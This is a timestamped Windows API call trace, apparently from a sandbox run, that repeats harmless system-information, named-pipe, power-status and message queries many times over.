	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.723] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.724] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.724] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.724] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0128.326] lstrlenW (lpString="") returned 0
	[0128.327] GetMessageExtraInfo () returned 0x0
	[0128.787] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0128.787] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0128.787] GetMessageExtraInfo () returned 0x0
	[0128.850] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0128.850] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0128.851] GetMessageExtraInfo () returned 0x0
	[0128.895] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0128.895] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0128.895] GetMessageExtraInfo () returned 0x0
	[0128.938] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0128.938] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0128.939] GetMessageExtraInfo () returned 0x0
	[0129.028] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.028] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.028] GetMessageExtraInfo () returned 0x0
	[0129.038] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.038] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.038] GetMessageExtraInfo () returned 0x0
	[0129.044] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.044] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.044] GetMessageExtraInfo () returned 0x0
	[0129.047] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.047] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.047] GetMessageExtraInfo () returned 0x0
	[0129.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.081] GetMessageExtraInfo () returned 0x0
	[0129.099] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.099] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.099] GetMessageExtraInfo () returned 0x0
	[0129.101] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.101] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.101] GetMessageExtraInfo () returned 0x0
	[0129.126] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.126] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.126] GetMessageExtraInfo () returned 0x0
	[0129.155] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.155] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.155] GetMessageExtraInfo () returned 0x0
	[0129.198] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.198] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.198] GetMessageExtraInfo () returned 0x0
	[0129.200] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.200] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.200] GetMessageExtraInfo () returned 0x0
	[0129.220] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.220] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.220] GetMessageExtraInfo () returned 0x0
	[0129.224] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.224] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.224] GetMessageExtraInfo () returned 0x0
	[0129.249] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.249] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.249] GetMessageExtraInfo () returned 0x0
	[0129.279] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.279] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.279] GetMessageExtraInfo () returned 0x0
	[0129.280] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.280] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.280] GetMessageExtraInfo () returned 0x0
	[0129.283] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.283] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.283] GetMessageExtraInfo () returned 0x0
	[0129.286] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.286] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.286] GetMessageExtraInfo () returned 0x0
	[0129.287] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.287] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.287] GetMessageExtraInfo () returned 0x0
	[0129.287] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.287] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.287] GetMessageExtraInfo () returned 0x0
	[0129.288] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.288] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.288] GetMessageExtraInfo () returned 0x0
	[0129.288] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.288] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.288] GetMessageExtraInfo () returned 0x0
	[0129.289] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.289] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.289] GetMessageExtraInfo () returned 0x0
	[0129.291] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.291] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.291] GetMessageExtraInfo () returned 0x0
	[0129.291] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.291] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.291] GetMessageExtraInfo () returned 0x0
	[0129.292] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.292] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.292] GetMessageExtraInfo () returned 0x0
	[0129.294] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.294] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.294] GetMessageExtraInfo () returned 0x0
	[0129.295] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.295] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.295] GetMessageExtraInfo () returned 0x0
	[0129.296] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.296] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.296] GetMessageExtraInfo () returned 0x0
	[0129.297] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.297] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.297] GetMessageExtraInfo () returned 0x0
	[0129.297] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.297] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.297] GetMessageExtraInfo () returned 0x0
	[0129.298] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.298] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.298] GetMessageExtraInfo () returned 0x0
	[0129.299] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.299] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.299] GetMessageExtraInfo () returned 0x0
	[0129.300] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.300] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.300] GetMessageExtraInfo () returned 0x0
	[0129.300] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
